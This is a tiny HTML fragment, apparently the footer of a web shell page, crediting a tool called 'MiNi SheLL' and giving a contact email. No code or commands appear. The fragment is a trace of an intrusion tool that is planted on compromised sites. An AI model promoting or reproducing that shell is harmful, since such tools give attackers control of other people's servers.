</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com